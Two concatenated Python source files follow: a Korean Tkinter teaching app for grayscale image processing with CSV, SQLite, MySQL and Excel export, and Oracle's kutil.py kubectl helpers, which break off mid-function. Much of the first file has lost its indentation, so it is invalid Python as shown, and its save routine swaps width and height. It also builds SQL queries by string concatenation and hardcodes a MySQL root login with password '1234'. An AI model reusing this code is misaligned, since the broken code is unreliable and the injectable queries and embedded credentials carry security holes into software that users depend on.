def putPixel() :
for i in range(0, outH,step) :
for k in range(0, outW,step) :
data = outImage[i][k]
paper.put('#%02x%02x%02x' % (data, data, data),
( int(k/step),int(i/step)))
threading.Thread(target=putPixel).start()
canvas.pack(expand=1, anchor =CENTER)
status.configure(text='이미지 정보:' + str(outW) + 'x' + str(outH) )
def equal() : # identity (copy) algorithm
    global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
    # important! decide the size of the output memory
    outW = inW; outH = inH;
    outImage = []; tmpList = []
    for i in range(outH): # allocate the output memory (initialized to 0)
        tmpList = []
        for k in range(outW):
            tmpList.append(0)
        outImage.append(tmpList)
    #############################
    # the actual image processing algorithm
    ############################
    for i in range(inH) :
        for k in range(inW) :
            outImage[i][k] = inImage[i][k]
    display()
def addImage() : # brighten algorithm
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# 중요! 출력메모리의 크기를 결정
outW = inW; outH = inH;
outImage = []; tmpList = []
for i in range(outH): # 출력메모리 확보(0으로 초기화)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
# 진짜 영상처리 알고리즘을 구현
############################
value = askinteger('밝게하기', '밝게할 값-->', minvalue=1, maxvalue=255)
for i in range(inH) :
for k in range(inW) :
if inImage[i][k] + value > 255 :
outImage[i][k] = 255
else :
outImage[i][k] = inImage[i][k] + value
display()
def a_average() : # average values of the input/output images
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
rawSum = 0
for i in range(inH) :
for k in range(inW) :
rawSum += inImage[i][k]
inRawAvg = int(rawSum / (inH*inW))
rawSum = 0
for i in range(outH) :
for k in range(outW) :
rawSum += outImage[i][k]
outRawAvg = int(rawSum / (outH*outW))
    subWindow = Toplevel(window) # sub-window owned by the parent (window)
subWindow.geometry('200x100')
label1 = Label(subWindow, text='입력영상 평균값 -->' + str(inRawAvg) ); label1.pack()
label2 = Label(subWindow, text='출력영상 평균값 -->' + str(outRawAvg)); label2.pack()
subWindow.mainloop()
def a_histogram() : # histogram
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
countList = [0] * 256; normalList = [0] * 256
for i in range(outH) :
for k in range(outW) :
value = outImage[i][k]
countList[value] += 1
    # normalized value = (count - min) * HIGH / (max - min)
maxVal = max (countList); minVal = min(countList)
for i in range(len(countList)) :
normalList[i] = (countList[i] - minVal) * 256 / (maxVal - minVal)
    # draw to the screen
subWindow = Toplevel(window)
subWindow.geometry('256x256')
subCanvas = Canvas(subWindow, width=256, height=256)
subPaper = PhotoImage(width=256, height=256)
subCanvas.create_image((256/2,256/2), image=subPaper, state='normal')
for i in range(0, 256) :
for k in range(0, int(normalList[i])) :
data = 0
subPaper.put('#%02x%02x%02x' % (data, data, data), (i, 255-k))
subCanvas.pack(expand=1, anchor=CENTER)
subWindow.mainloop()
import matplotlib.pyplot as plt
def a_histogram2() : # histogram (matplotlib)
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
countList = [0] * 256
for i in range(outH) :
for k in range(outW) :
value = outImage[i][k]
countList[value] += 1
plt.plot(countList)
plt.show()
def upDown() : # vertical flip algorithm
    global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
    # important! decide the size of the output memory
    outW = inW; outH = inH;
    outImage = []; tmpList = []
    for i in range(outH): # allocate the output memory (initialized to 0)
        tmpList = []
        for k in range(outW):
            tmpList.append(0)
        outImage.append(tmpList)
    #############################
    # the actual image processing algorithm
    ############################
    for i in range(inH) :
        for k in range(inW) :
            outImage[outH-1-i][k] = inImage[i][k]
    display()
def panImage() :
global panYN
panYN = True
def mouseClick(event) : # record the pan start point
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
global sx, sy, ex, ey, panYN
if not panYN :
return
sx = event.x; sy = event.y;
def mouseDrop(event): # apply the pan when the mouse is released
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
global sx, sy, ex, ey, panYN
if not panYN:
return
ex = event.x; ey = event.y;
my = sx - ex ; mx = sy - ey
# 중요! 출력메모리의 크기를 결정
outW = inW; outH = inH;
outImage = []; tmpList = []
for i in range(outH): # 출력메모리 확보(0으로 초기화)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
# 진짜 영상처리 알고리즘을 구현
############################
for i in range(inH) :
for k in range(inW) :
if 0<= i-mx <outH and 0<= k-my < outW :
outImage[i-mx][k-my] = inImage[i][k]
panYN = False
display()
def zoomOut() : # shrink (zoom out) algorithm
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# 중요! 출력메모리의 크기를 결정
scale = askinteger('축소하기', '축소할 배수-->', minvalue=2, maxvalue=32)
outW = int(inW/scale); outH = int(inH/scale);
outImage = []; tmpList = []
for i in range(outH): # 출력메모리 확보(0으로 초기화)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
# 진짜 영상처리 알고리즘을 구현
############################
for i in range(inH) :
for k in range(inW) :
outImage[int(i/scale)][int(k/scale)] = inImage[i][k]
display()
import struct
def saveFile() :
global window, canvas, paper, filename,inImage, outImage,inW, inH, outW, outH
saveFp = asksaveasfile(parent=window, mode='wb',
defaultextension="*.raw", filetypes=(("RAW파일", "*.raw"), ("모든파일", "*.*")))
for i in range(outW):
for k in range(outH):
saveFp.write( struct.pack('B',outImage[i][k]))
saveFp.close()
def exitFile() :
global window, canvas, paper, filename,inImage, outImage,inW, inH, outW, outH
pass
import csv
def saveCSV() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
output_file = asksaveasfile(parent=window, mode='w',
defaultextension="*.csv", filetypes=(("CSV파일", "*.csv"), ("모든파일", "*.*")))
output_file = output_file.name
header = ['Column', 'Row', 'Value']
with open(output_file, 'w', newline='') as filewriter:
csvWriter = csv.writer(filewriter)
csvWriter.writerow(header)
for row in range(outW):
for col in range(outH):
data = outImage[row][col]
row_list = [row, col, data]
csvWriter.writerow(row_list)
print('OK!')
def saveShuffleCSV() :
pass
def loadCSV(fname) :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
fsize = -1
fp = open(fname, 'r')
for f in fp :
fsize += 1
fp.close()
inH = inW = int(math.sqrt(fsize)) # 입력메모리 크기 결정! (중요)
inImage = []; tmpList = []
for i in range(inH) : # 입력메모리 확보(0으로 초기화)
tmpList = []
for k in range(inW) :
tmpList.append(0)
inImage.append(tmpList)
# 파일 --> 메모리로 데이터 로딩
fp = open(fname, 'r') # 파일 열기(바이너리 모드)
csvFP = csv.reader(fp)
next(csvFP)
for row_list in csvFP :
row= int(row_list[0]) ; col = int(row_list[1]) ; value=int(row_list[2])
inImage[row][col] = value
fp.close()
def openCSV() :
global window, canvas, paper, filename,inImage, outImage,inW, inH, outW, outH
filename = askopenfilename(parent=window,
filetypes=(("CSV파일", "*.csv"), ("모든파일", "*.*")))
loadCSV(filename) # 파일 --> 입력메모리
equal() # 입력메모리--> 출력메모리
import sqlite3
def saveSQLite() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
global csvList, input_file
    con = sqlite3.connect('imageDB') # open (or create) the database
    cur = con.cursor() # create a cursor (the channel for sending queries)
    # build the list of column names
    colList = []
fname = os.path.basename(filename).split(".")[0]
try:
sql = "CREATE TABLE imageTable( filename CHAR(20), resolution smallint" + \
", row smallint, col smallint, value smallint)"
cur.execute(sql)
except:
pass
for i in range(inW) :
for k in range(inH) :
sql = "INSERT INTO imageTable VALUES('" + fname + "'," + str(inW) + \
"," + str(i) + "," + str(k) + "," + str(inImage[i][k]) +")"
cur.execute(sql)
con.commit()
cur.close()
con.close() # 데이터베이스 연결 종료
print('Ok!')
def openSQLite() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
global csvList, input_file
con = sqlite3.connect('imageDB') # 데이터베이스 지정(또는 연결)
cur = con.cursor() # 연결 통로 생성 (쿼리문을 날릴 통로)
try :
sql = "SELECT DISTINCT filename, resolution FROM imageTable"
cur.execute(sql)
        tableNameList = [] # e.g. ['dog:128', 'dog:512', ...]
while True :
row = cur.fetchone()
if row == None :
break
tableNameList.append( row[0] + ':' + str(row[1]) )
        ######## Inner function: a function defined inside another (local) function #######
def selectTable() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
selectedIndex = listbox.curselection()[0]
subWindow.destroy()
fname, res = tableNameList[selectedIndex].split(':')
filename = fname
sql = "SELECT row, col, value FROM imageTable WHERE filename='" + \
fname + "' AND resolution=" + res
print(sql)
cur.execute(sql)
inH = inW = int(res)
inImage = []; tmpList = []
for i in range(inH): # 입력메모리 확보(0으로 초기화)
tmpList = []
for k in range(inW):
tmpList.append(0)
inImage.append(tmpList)
while True :
row_tuple = cur.fetchone()
if row_tuple == None :
break
row, col, value = row_tuple
inImage[row][col] = value
cur.close()
con.close()
equal()
print("Ok! openSQLite")
################################################################
subWindow = Toplevel(window)
listbox = Listbox(subWindow)
button = Button(subWindow, text='선택', command=selectTable)
listbox.pack(); button.pack()
for sName in tableNameList :
listbox.insert(END, sName)
subWindow.lift()
except :
cur.close()
con.close()
print("Error! openSQLite")
import pymysql
def saveMySQL() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
global csvList, input_file
con = pymysql.connect(host='192.168.174.129', user='root',
                          password='1234', db='imageDB', charset='utf8') # open (or connect to) the database
    cur = con.cursor() # create a cursor (the channel for sending queries)
    # build the list of column names
    colList = []
fname = os.path.basename(filename).split(".")[0]
try:
sql = "CREATE TABLE imageTable( filename CHAR(20), resolution smallint" + \
", row smallint, col smallint, value smallint)"
cur.execute(sql)
except:
pass
try:
sql = "DELETE FROM imageTable WHERE filename='" + \
fname + "' AND resolution=" + str(outW)
cur.execute(sql)
con.commit()
except:
pass
for i in range(inW) :
for k in range(inH) :
sql = "INSERT INTO imageTable VALUES('" + fname + "'," + str(outW) + \
"," + str(i) + "," + str(k) + "," + str(outImage[i][k]) +")"
cur.execute(sql)
con.commit()
cur.close()
con.close() # 데이터베이스 연결 종료
print('Ok! saveMySQL')
def openMySQL() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
global csvList, input_file
con = pymysql.connect(host='192.168.174.129', user='root',
password='1234', db='imageDB', charset='utf8') # 데이터베이스 지정(또는 연결)
cur = con.cursor() # 연결 통로 생성 (쿼리문을 날릴 통로)
try :
sql = "SELECT DISTINCT filename, resolution FROM imageTable"
cur.execute(sql)
        tableNameList = [] # e.g. ['dog:128', 'dog:512', ...]
while True :
row = cur.fetchone()
if row == None :
break
tableNameList.append( row[0] + ':' + str(row[1]) )
        ######## Inner function: a function defined inside another (local) function #######
def selectTable() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
selectedIndex = listbox.curselection()[0]
subWindow.destroy()
fname, res = tableNameList[selectedIndex].split(':')
filename = fname
sql = "SELECT row, col, value FROM imageTable WHERE filename='" + \
fname + "' AND resolution=" + res
print(sql)
cur.execute(sql)
inH = inW = int(res)
inImage = []; tmpList = []
for i in range(inH): # 입력메모리 확보(0으로 초기화)
tmpList = []
for k in range(inW):
tmpList.append(0)
inImage.append(tmpList)
while True :
row_tuple = cur.fetchone()
if row_tuple == None :
break
row, col, value = row_tuple
inImage[row][col] = value
cur.close()
con.close()
equal()
print("Ok! openMySQL")
################################################################
subWindow = Toplevel(window)
listbox = Listbox(subWindow)
button = Button(subWindow, text='선택', command=selectTable)
listbox.pack(); button.pack()
for sName in tableNameList :
listbox.insert(END, sName)
subWindow.lift()
except :
cur.close()
con.close()
print("Error! openMySQL")
import xlwt
def saveExcel1() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
output_file = asksaveasfile(parent=window, mode='w',
defaultextension="*.xls", filetypes=(("XLS파일", "*.xls"), ("모든파일", "*.*")))
output_file = output_file.name
sheetName = os.path.basename(output_file).split(".")[0]
wb = xlwt.Workbook()
ws = wb.add_sheet(sheetName)
for rowNum in range(outH):
for colNum in range(outW):
data = outImage[rowNum][colNum]
ws.write(rowNum, colNum, data)
wb.save(output_file)
print('OK! saveExcel1')
import xlsxwriter
def saveExcel2() :
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
output_file = asksaveasfile(parent=window, mode='w',
defaultextension="*.xlsx", filetypes=(("XLSX파일", "*.xls"), ("모든파일", "*.*")))
output_file = output_file.name
sheetName = os.path.basename(output_file).split(".")[0]
wb = xlsxwriter.Workbook(output_file)
ws = wb.add_worksheet(sheetName)
    ws.set_column(0, outW, 1.0) # roughly 0.34
    for r in range(outH):
        ws.set_row(r, 9.5) # roughly 0.35
for rowNum in range(outW) :
for colNum in range(outH) :
data = outImage[rowNum][colNum]
            # use the data value as the cell background color (#000000~#FFFFFF)
            if data > 15 :
                hexStr = '#' + (hex(data)[2:])*3
            else :
                hexStr = '#' + ('0' + hex(data)[2:]) * 3
            # prepare the cell format
cell_format = wb.add_format()
cell_format.set_bg_color(hexStr)
ws.write(rowNum, colNum, '', cell_format)
wb.close()
print('OK! saveExcel2')
def a_histoStretch() : # histogram stretching algorithm
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# 중요! 출력메모리의 크기를 결정
outW = inW; outH = inH;
outImage = []; tmpList = []
for i in range(outH): # 출력메모리 확보(0으로 초기화)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
# 진짜 영상처리 알고리즘을 구현
############################
maxVal, minVal, HIGH = 0, 255, 255
for i in range(inH) :
for k in range(inW) :
data = inImage[i][k]
if data > maxVal :
maxVal = data
if data < minVal :
minVal = data
    # histogram stretching
    # OUT = (IN - min) * HIGH / (max - min)
for i in range(inH) :
for k in range(inW) :
value = int( (inImage[i][k] - minVal) * HIGH / ( maxVal - minVal) )
if value < 0 :
value = 0
elif value > 255 :
value = 255
outImage[i][k] = value
display()
def a_endInSearch() : # end-in search algorithm
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# 중요! 출력메모리의 크기를 결정
outW = inW; outH = inH;
outImage = []; tmpList = []
for i in range(outH): # 출력메모리 확보(0으로 초기화)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
#############################
# 진짜 영상처리 알고리즘을 구현
############################
maxVal, minVal, HIGH = 0, 255, 255
for i in range(inH) :
for k in range(inW) :
data = inImage[i][k]
if data > maxVal :
maxVal = data
if data < minVal :
minVal = data
limit = askinteger('엔드인', '상하 범위:', minvalue=1, maxvalue=127)
maxVal -= limit
minVal += limit
    # histogram stretching over the clipped range
    # OUT = (IN - min) * HIGH / (max - min)
for i in range(inH) :
for k in range(inW) :
value = int( (inImage[i][k] - minVal) * HIGH / ( maxVal - minVal) )
if value < 0 :
value = 0
elif value > 255 :
value = 255
outImage[i][k] = value
display()
def a_histoEqual() : # histogram equalization algorithm
    global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
    # important! decide the size of the output memory
    outW = inW; outH = inH;
    outImage = []; tmpList = []
    for i in range(outH): # allocate the output memory (initialized to 0)
        tmpList = []
        for k in range(outW):
            tmpList.append(0)
        outImage.append(tmpList)
    #############################
    # the actual image processing algorithm
    ############################
    # 256 bins (pixel values 0~255); 255 bins would overflow on the value 255
    histo = [0] * 256; sumHisto = [0] * 256; normalHisto = [0] * 256
    HIGH = 255
    # build the histogram
    for i in range(inH) :
        for k in range(inW) :
            value = inImage[i][k]
            histo[value] += 1
    # build the cumulative histogram
    sVal = 0
    for i in range(len(histo)) :
        sVal += histo[i]
        sumHisto[i] = sVal
    # normalized cumulative histogram : (cumulative sum / (rows*cols)) * HIGH
    for i in range(len(sumHisto)) :
        normalHisto[i] = int(sumHisto[i] / (outW * outH) * HIGH)
    # write the output using the normalized values
    for i in range(inH) :
        for k in range(inW) :
            index = inImage[i][k]
            outImage[i][k] = normalHisto[index]
    display()
def embossing() : # area processing - embossing algorithm
global window, canvas, paper, filename, inImage, outImage, inW, inH, outW, outH
# 중요! 출력메모리의 크기를 결정
outW = inW; outH = inH;
outImage = []; tmpList = []
for i in range(outH): # 출력메모리 확보(0으로 초기화)
tmpList = []
for k in range(outW):
tmpList.append(0)
outImage.append(tmpList)
    #############################
    # the actual image processing algorithm
    ############################
    MSIZE=3
    mask = [ [-1, 0, 0], [0, 0, 0], [0, 0, 1] ]
    # temporary input image, two rows/columns larger than inImage
tmpInImage = []
for i in range(inH + 2):
tmpList = []
for k in range(inW + 2):
tmpList.append(128)
tmpInImage.append(tmpList)
tmpOutImage = []
for i in range(outH):
tmpList = []
for k in range(outW):
tmpList.append(0)
tmpOutImage.append(tmpList)
    # original input --> temporary input
for i in range(inH):
for k in range(inW):
tmpInImage[i+1][k+1] = inImage[i][k]
    # convolution: slide the mask across the image and accumulate
for i in range(1, inH):
for k in range(1, inW):
            # process one point with the 3x3 mask: multiply each coefficient and sum
S = 0.0
for m in range(0,MSIZE) :
for n in range(0,MSIZE) :
S += mask[m][n]*tmpInImage[i+(m-1)][k+(n-1)]
tmpOutImage[i-1][k-1] = S
    # add 127 (since the mask coefficients sum to 0)
for i in range(outW):
for k in range(outH):
tmpOutImage[i][k] += 127
    # temporary output --> original output
for i in range(outW) :
for k in range(outH) :
value = int(tmpOutImage[i][k])
if value > 255 :
value = 255
elif value < 0 :
value = 0
outImage[i][k] = value
display()
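# Note (my addition, not from the original tool): the same convolution loop works with any
# 3x3 mask. For example, a sharpening mask would be
#     mask = [ [0, -1, 0], [-1, 5, -1], [0, -1, 0] ]
# and, because its coefficients sum to 1 rather than 0, the "+127" offset step above should
# then be skipped.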
## Global variables
window, canvas, paper, filename = [None] * 4
inImage, outImage = [], []; inW, inH, outW, outH = [0] * 4
panYN = False; sx, sy, ex, ey = [0] * 4
VIEW_X, VIEW_Y = 128, 128
status = None
## Main code
window = Tk(); window.geometry('400x400');
window.title('영상 처리&데이터 분석 Ver 1.0 (Beta 1)')
window.bind("<Button-1>", mouseClick)
window.bind("<ButtonRelease-1>", mouseDrop)
status = Label(window, text='이미지 정보:', bd=1, relief=SUNKEN, anchor=W)
status.pack(side=BOTTOM, fill=X)
mainMenu = Menu(window);window.config(menu=mainMenu)
fileMenu = Menu(mainMenu);mainMenu.add_cascade(label='파일', menu=fileMenu)
fileMenu.add_command(label='열기', command=openFile)
fileMenu.add_command(label='저장', command=saveFile)
fileMenu.add_separator()
fileMenu.add_command(label='종료', command=exitFile)
pixelMenu = Menu(mainMenu);mainMenu.add_cascade(label='화소점처리', menu=pixelMenu)
pixelMenu.add_command(label='동일영상', command=equal)
pixelMenu.add_command(label='밝게하기', command=addImage)
areaMenu = Menu(mainMenu);mainMenu.add_cascade(label='화소영역처리', menu=areaMenu)
areaMenu.add_command(label='엠보싱', command=embossing)
geoMenu = Menu(mainMenu);mainMenu.add_cascade(label='기하학 처리', menu=geoMenu)
geoMenu.add_command(label='상하반전', command=upDown)
geoMenu.add_command(label='화면이동', command=panImage)
geoMenu.add_command(label='화면축소', command=zoomOut)
analyzeMenu = Menu(mainMenu);mainMenu.add_cascade(label='데이터분석', menu=analyzeMenu)
analyzeMenu.add_command(label='평균값', command=a_average)
analyzeMenu.add_command(label='히스토그램', command=a_histogram)
analyzeMenu.add_command(label='히스토그램(matplotlib)', command=a_histogram2)
analyzeMenu.add_separator()
analyzeMenu.add_command(label='히스토그램 스트래칭', command=a_histoStretch)
analyzeMenu.add_command(label='엔드-인 탐색', command=a_endInSearch)
analyzeMenu.add_command(label='히스토그램 평활화', command=a_histoEqual)
otherMenu = Menu(mainMenu);mainMenu.add_cascade(label='다른 포맷 처리', menu=otherMenu)
otherMenu.add_command(label='CSV로 내보내기', command=saveCSV)
otherMenu.add_command(label='CSV(셔플)로 내보내기', command=saveShuffleCSV)
otherMenu.add_command(label='CSV 불러오기', command=openCSV)
otherMenu.add_separator()
otherMenu.add_command(label='SQLite로 내보내기', command=saveSQLite)
otherMenu.add_command(label='SQLite에서 가져오기', command=openSQLite)
otherMenu.add_separator()
otherMenu.add_command(label='MySQL로 내보내기', command=saveMySQL)
otherMenu.add_command(label='MySQL에서 가져오기', command=openMySQL)
otherMenu.add_separator()
otherMenu.add_command(label='Excel로 내보내기(숫자)', command=saveExcel1)
otherMenu.add_command(label='Excel로 내보내기(음영)', command=saveExcel2)
window.mainloop()
|
kutil.py
|
# Copyright (c) 2020, 2021, Oracle and/or its affiliates.
#
# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/
#
# Kubernetes (kubectl) utilities
# Use kubectl instead of the API so we go through the same code path as an end-user
import os
import subprocess
import logging
import threading
import time
import re
import yaml
import base64
import pathlib
logger = logging.getLogger("kutil")
debug_kubectl = False
ALL_RSRC_TYPES = ["ic", "mbk", "po", "sts", "rs", "deploy",
"svc", "cm", "secret", "jobs", "deploy", "pvc", "sa"]
def b64decode(s):
return base64.b64decode(s).decode("utf8")
def b64encode(s):
return base64.b64encode(bytes(s, "utf8")).decode("ascii")
def strip_blanks(s):
"""
Strip empty lines in the string.
"""
return "\n".join([l for l in s.split("\n") if l.strip()])
class TableSplitter:
def __init__(self, header):
columns = []
while header:
end = header.find(" ")
if end < 0:
columns.append(header)
header = ""
else:
while end < len(header) and header[end] == " ":
end += 1
columns.append(header[:end])
header = header[end:]
self.widths = [len(c) for c in columns]
self.columns = [c.strip() for c in columns]
# TODO handle changing column widths
def split(self, line):
fields = []
offs = 0
for i, p in enumerate(self.widths[:-1]):
op = p
            # adjust widths in case some column grew
while p <= len(line) and line[p-1] != " ":
p += 1
offs += 1
if p > op:
while p < len(line) and line[p] == " ":
p += 1
offs += 1
self.widths[i] = p
fields.append(line[:p].strip())
line = line[p:]
fields.append(line.strip())
return fields
def split_dict(self, line):
return dict(zip(self.columns, self.split(line)))
def split_table(s):
lines = s.rstrip().split("\n")
splitter = TableSplitter(lines[0])
return [dict(zip(splitter.columns, splitter.split(l))) for l in lines[1:]]
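# Illustrative example (assumed input, not from the original module): split_table() turns
# fixed-width `kubectl get ...` output into a list of row dicts keyed by the header line.
#
#     text = ("NAME      READY   STATUS\n"
#             "mypod-0   1/1     Running\n")
#     split_table(text)
#     # -> [{'NAME': 'mypod-0', 'READY': '1/1', 'STATUS': 'Running'}]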
def kubectl(cmd, rsrc=None, args=None, timeout=None, check=True, ignore=[]):
argv = ["kubectl", cmd]
if rsrc:
argv.append(rsrc)
if args:
argv += args
if debug_kubectl:
logger.debug("run %s", " ".join(argv))
try:
r = subprocess.run(argv, timeout=timeout,
check=check, capture_output=True)
except subprocess.CalledProcessError as e:
for ig in ignore:
if "(%s)" % ig in e.stderr.decode("utf8"):
if debug_kubectl:
logger.debug("rc = %s, stderr=%s",
e.returncode, e.stderr.decode("utf8"))
return
else:
logger.error("kubectl %s failed:\n stderr=%s\n stdout=%s",
e.cmd, e.stderr.decode("utf8"), e.stdout.decode("utf8"))
raise
if debug_kubectl:
logger.debug("rc = %s, stdout = %s", r.returncode,
r.stdout.decode("utf8"))
return r
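# Usage sketch (illustrative namespace/pod names, not from the original module):
#
#     kubectl("get", "po", args=["-n", "my-ns"])                      # raises on failure
#     kubectl("delete", "po", args=["mypod-0", "-n", "my-ns"],
#             timeout=60, ignore=["NotFound"])                        # tolerate a missing pod
#
# `ignore` matches the parenthesized reason in kubectl's stderr output, e.g. "(NotFound)".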
def kubectl_popen(cmd, args=[]):
argv = ["kubectl", cmd] + args
if debug_kubectl:
logger.debug("popen %s", " ".join(argv))
return subprocess.Popen(argv, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
def watch(ns, rsrc, name, fn, timeout, format=None):
argv = ["kubectl", "get", rsrc, "-n", ns, "--watch", "-o%s" % format]
if name:
argv.append(name)
found = None
def kill_on_timeout(p):
start_time = time.time()
while time.time() - start_time < timeout and p.poll() is None:
time.sleep(1)
if p.poll() is None and not found:
logger.info(f"Timeout waiting for condition on {rsrc}")
p.terminate()
if debug_kubectl:
logger.debug("run %s", argv)
p = subprocess.Popen(argv, stdout=subprocess.PIPE)
thd = threading.Thread(target=kill_on_timeout, args=(p,))
thd.start()
header = p.stdout.readline().decode("utf8")
splitter = TableSplitter(header)
output = [header]
while p.poll() is None:
line = p.stdout.readline().decode("utf8")
output.append(line)
if fn(splitter.split_dict(line)):
if debug_kubectl:
logger.debug(
f"watch condition on {rsrc} succeeded with {line}")
p.terminate()
found = line
break
thd.join()
output = "".join(output)
if not found:
logger.error(
f"Timeout waiting for condition in {rsrc} {ns}/{name}. output={output}")
if debug_kubectl:
logger.debug("rc = %s, stdout = %s", p.returncode, output)
return found
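# Usage sketch (illustrative, not from the original module): block until the named pod
# reports 2/2 ready containers, or give up after 300 seconds.
#
#     watch(ns, "po", name,
#           lambda row: row.get("READY") == "2/2",
#           timeout=300, format="wide")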
def feed_kubectl(input, cmd, rsrc=None, args=None, check=True):
argv = ["kubectl", cmd]
if rsrc:
argv.append(rsrc)
if args:
argv += args
if debug_kubectl:
logger.debug("run %s", argv)
r = subprocess.run(argv, input=input.encode("utf8"),
stdout=subprocess.PIPE, stderr=subprocess.STDOUT,
check=check)
print(r.stdout.decode("utf8"))
if debug_kubectl:
logger.debug("rc = %s", r)
return r
#
def __ls(ns, rsrc):
return split_table(kubectl("get", rsrc, args=["-n", ns]).stdout.decode("utf8"))
def ls_ic(ns):
return __ls(ns, "ic")
def ls_mbk(ns):
return __ls(ns, "mbk")
def ls_sts(ns):
return __ls(ns, "sts")
def ls_rs(ns):
return __ls(ns, "rs")
def ls_deploy(ns):
return __ls(ns, "deploy")
def ls_svc(ns):
return __ls(ns, "svc")
def ls_po(ns, *, pattern=".*"):
pods = __ls(ns, "po")
r = re.compile(pattern)
return [pod for pod in pods if r.match(pod["NAME"])]
def ls_pvc(ns):
return __ls(ns, "pvc")
def ls_pv(ns):
return __ls(ns, "pv")
def ls_all_raw(ns):
output = []
for t in ALL_RSRC_TYPES:
r = kubectl("get", t, args=["-n", ns]).stdout.decode("utf8")
if r and t == "secret":
# strip automatically added default token
lines = [l for l in r.strip().split(
"\n") if not l.startswith("default-token-")]
if len(lines) <= 1:
r = ""
else:
r = "\n".join(lines)
if r:
output.append("### " + t)
output.append(r)
return "\n".join(output)
def ls_ns():
return split_table(kubectl("get", "namespace").stdout.decode("utf8"))
#
def get(ns, rsrc, name):
r = kubectl("get", rsrc, args=[name, "-n", ns, "-o=yaml"])
if r.stdout:
return yaml.safe_load(r.stdout.decode("utf8"))
return None
def get_ic(ns, name, jpath=None):
return get(ns, "ic", name)
def get_mbk(ns, name, jpath=None):
return get(ns, "mbk", name)
def get_sts(ns, name, jpath=None):
return get(ns, "sts", name)
def get_rs(ns, name, jpath=None):
return get(ns, "rs", name)
def get_deploy(ns, name, jpath=None):
return get(ns, "deploy", name)
def get_svc(ns, name, jpath=None):
return get(ns, "svc", name)
def get_po(ns, name, jpath=None):
return get(ns, "po", name)
def get_ev(ns, selector, *, after=None, fields=None):
def lookup(obj, field):
r = {}
f, dot, rest = field.partition(".")
if rest:
assert isinstance(obj[f], dict), field
r[f] = lookup(obj[f], rest)
else:
assert f in obj, f"key={f} dict={obj}"
r[f] = obj[f]
return r
r = kubectl("get", "ev", args=[
"--field-selector="+selector,
"--sort-by=.metadata.creationTimestamp",
"-n", ns, "-o=yaml"])
if r.stdout:
evs = yaml.safe_load(r.stdout.decode("utf8"))["items"]
if after or fields:
res = []
for ev in evs:
if (not after or
ev["metadata"]["creationTimestamp"] >= after):
nev = {}
if fields:
for f in fields:
nev.update(lookup(ev, f))
else:
nev = ev
res.append(nev)
evs = res
return evs
return None
def get_ic_ev(ns, icname, *, after=None, fields=None):
return get_ev(ns, f"involvedObject.kind=InnoDBCluster,involvedObject.name={icname}", after=after, fields=fields)
def get_po_ev(ns, name, *, after=None, fields=None):
return get_ev(ns, f"involvedObject.kind=Pod,involvedObject.name={name}", after=after, fields=fields)
#
def describe_po(ns, name, jpath=None):
r = kubectl("describe", "po", [name, "-n", ns])
if r.stdout:
return r.stdout.decode("utf8")
raise Exception(f"Error for describe {ns}/{name}")
def describe_ic(ns, name):
r = kubectl("describe", "ic", [name, "-n", ns])
if r.stdout:
return r.stdout.decode("utf8")
raise Exception(f"Error for describe {ns}/{name}")
#
def delete(ns, rsrc, name, timeout):
if not name:
name = "--all"
kubectl("delete", rsrc, [name] + (["-n", ns]
if ns else []), timeout=timeout, ignore=["NotFound"])
def delete_ic(ns, name, timeout=200):
delete(ns, "ic", name, timeout=timeout)
def delete_mbk(ns, name, timeout=200):
delete(ns, "mbk", name, timeout=timeout)
def delete_po(ns, name, timeout=120):
delete(ns, "po", name, timeout=timeout)
def delete_sts(ns, name, timeout=5):
delete(ns, "sts", name, timeout=timeout)
def delete_rs(ns, name, timeout=5):
delete(ns, "rs", name, timeout=timeout)
def delete_deploy(ns, name, timeout=5):
delete(ns, "deploy", name, timeout=timeout)
def delete_svc(ns, name, timeout=5):
delete(ns, "svc", name, timeout=timeout)
def delete_pvc(ns, name, timeout=60):
delete(ns, "pvc", name, timeout=timeout)
def delete_pv(name, timeout=60):
delete(None, "pv", name, timeout=timeout)
def delete_ns(ns, timeout=90):
delete(None, "ns", ns, timeout=timeout)
def delete_cm(ns, name, timeout=5):
delete(ns, "cm", name, timeout=timeout)
def delete_secret(ns, name, timeout=5):
delete(ns, "secret", name, timeout=timeout)
#
def logs(ns, name, prev=False):
if type(name) is str:
args = [name]
else:
args = [name[0], "-c", name[1]]
if prev:
args.append("-p")
return kubectl("logs", None, args + ["-n", ns]).stdout.decode("utf8")
def cat(ns, name, path):
if type(name) is str:
args = [name]
else:
args = [name[0], "-c", name[1]]
args += ["-n", ns, "--", "cat", path]
p = kubectl_popen("exec", args)
s = p.stdout.read()
p.terminate()
return s
def exec(ns, name, cmd):
if type(name) is str:
args = [name]
else:
args = [name[0], "-c", name[1]]
